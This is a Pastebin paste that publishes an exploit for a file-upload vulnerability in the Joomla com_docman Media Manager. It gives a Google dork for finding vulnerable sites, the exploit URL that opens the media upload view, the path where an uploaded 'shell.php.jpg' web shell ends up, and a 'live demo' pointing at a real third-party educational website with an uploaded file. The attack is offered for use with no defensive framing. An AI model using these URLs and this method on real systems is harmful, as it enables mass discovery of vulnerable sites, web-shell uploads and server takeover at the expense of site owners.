Advertisement
3xploit3r

Joomla (com_docman) Media Manager File Upload

Aug 15th, 2016
224
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ,------. ,--. ,-----. ,--.
  2. | .-. \ ,---. ,--,--. ,-| | ,---. ' .-. ',--.,--.| |
  3. | | \ :| .-. :' ,-. |' .-. |( .-' | | | || || || |
  4. | '--' /\ --.\ '-' |\ `-' |.-' `)' '-' '' '' '| |
  5. `-------' `----' `--`--' `---' `----' `-----' `----' `--'
  6. dead_s0ul@outlook.com
  7.  
  8. # Exploit Title: Joomla (com_docman) Media Manager File Upload Vulnerability
  9. # Date: 05/11/2014
  10. # Tested on: Windows + Linux ++
  11. # Google dork: inurl:index.php?option=com_docman
  12. # SS : http://photouploads.com/images/comdocman.png
  13.  
  14. # Exploit
  15.  
  16. http://localhost/path/index.php/component/media/?view=images&tmpl=component&e_name=description&asset=com_docman&author=
  17.  
  18. # Shell path:
  19. http://localhost/images/shell.php.jpg
  20.  
  21. Live Demo :
  22. http://www.infotepsai.edu.co/index.php/component/media/?view=images&tmpl=component&e_name=description&asset=com_docman&author=
  23.  
  24. http://www.infotepsai.edu.co/images/AG.jpg
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement